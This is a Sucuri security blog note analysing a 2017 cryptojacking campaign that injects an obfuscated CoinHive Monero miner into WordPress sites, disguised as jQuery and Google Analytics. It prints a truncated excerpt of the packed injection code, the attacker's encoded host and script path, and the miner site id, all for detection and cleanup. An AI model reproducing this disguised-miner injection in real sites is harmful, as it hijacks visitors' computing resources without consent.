• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Fake jQuery and Google Analytics Hide Yet Another Cryptominer

November 24, 2017Denis Sinegubko

0
SHARES
FacebookTwitterSubscribe

This is a quick posts about yet another quite massive attack that installs CoinHive JavaScript Monero miners on compromised websites. You might have already read our blog posts on how such attacks were first detected and how they escalated after that.

On Oct 30th, 2017 Microsoft Malware Protection Services tweeted about a new cryptocurrency miner on compromised sites.

A very new cryptocurrency miner we found in possibly compromised sites pretends to be legitimate code by using the name “googleanalytics” pic.twitter.com/lDphULt4hX

— Microsoft MMPC (@msftmmpc) October 30, 2017

The malicious code has a few of interesting features that help obfuscate its true nature:

  1. use of a non-dotted decimal notation for the host name: 3104709642(which translates to 185 .14 .28 .10)
  2. quite a common trick of using jQuery name as a script name: hxxp://3104709642/lib/jquery-3.2.1.min.js?v=3.2.11 (the script actually loads the obfuscated version of the CoinHive library)
  3. use of Google Analytics related variable names (google_analytics, googleanalytics) instead of the suspicious miner, to make it look even more legit.

If you remove the layers of obfuscation, it’s still a typical CoinHive mining script that uses the NPRak9QU4lFBSneFt23qEIChh5r0SZev site id for the miner.

We decided to search for compromised sites with this script, but it turned out that the screenshot provided by Microsoft was not version of the script injected to websites. It was an already decoded version of the malicious script. The original code looks like this

eval(function(p,​a,c,k,e,r){e=function(c)...skipped...document|google_analytics|function|var|type|text|javascript|5000|addScript|getElementsByTagName|body|appendChild|setTimeout|createElement|stats|11|3104709642|lib|jquery|onload|src|innerHTML|min|new|googleanalytics|Anonymous||NPRak9QU4lFBSneFt23qEIChh5r0SZev|start|http|window|js'​.split('|'),0,{​}))

A quick search on PublicWWW revealed 1833 infected websites (as of Nov 22, 2017). We checked quite a few of them – they were all WordPress sites. Moreover, all the infected sites also shared the “cloudflare.solutions” malware (now it loads a keylogger script) that we wrote about this April.

This is a typical WordPress infection and you can use our guide to clean it or have us do it for you.

0
SHARES
FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, Website SecurityTags: Cryptominers, Labs Note

About Denis Sinegubko

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him not online at all. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.